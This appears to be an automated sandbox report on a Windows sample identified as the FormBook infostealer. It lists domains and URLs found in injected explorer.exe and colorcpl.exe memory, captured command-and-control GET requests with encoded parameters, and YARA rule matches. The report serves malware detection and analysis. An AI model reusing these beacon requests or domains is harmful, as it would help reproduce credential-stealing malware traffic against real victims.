Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.comReferer:
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.net/jskg/www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.pnorg.netReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.info/jskg/www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ppc-listing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.revistabrasileiramarketing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.com/jskg/www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.saraadamchak.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.successwithyolandafgreen.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.switchtoambitwithmirtha.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.com/jskg/www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.topazkibblez.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.com/jskg/www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.wisdomtoothguru.comReferer:
Source: explorer.exe, 00000003.00000003.3779584594.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094563543.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4455465026.000000000C54A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000003.3095015364.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3780015458.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2003510228.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.4453052192.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.2003510228.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3779212000.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2002563045.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4450259084.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000003.00000003.3094165083.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095171280.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094165083.0000000009D42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.4455231166.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: unknown DNS traffic detected: queries for: www.revistabrasileiramarketing.info
Source: C:\Windows\explorer.exe Code function: 3_2_103F1302 getaddrinfo,setsockopt,recv, 3_2_103F1302
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 1.exe PID: 1892, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: 1.exe PID: 2136, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 3716, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
.NET source code contains very large array initializations
Source: 0.2.1.exe.26a00000.6.raw.unpack, .cs Large array initialization: : array initializer size 29521
.NET source code contains very large strings
Source: 1.exe, SplashScreen1.cs Long String: Length: 81136
Source: 3.2.explorer.exe.111b7960.0.raw.unpack, SplashScreen1.cs Long String: Length: 81136
Source: 4.2.colorcpl.exe.5377960.3.raw.unpack, SplashScreen1.cs Long String: Length: 81136
Uses 32bit PE files
Source: 1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
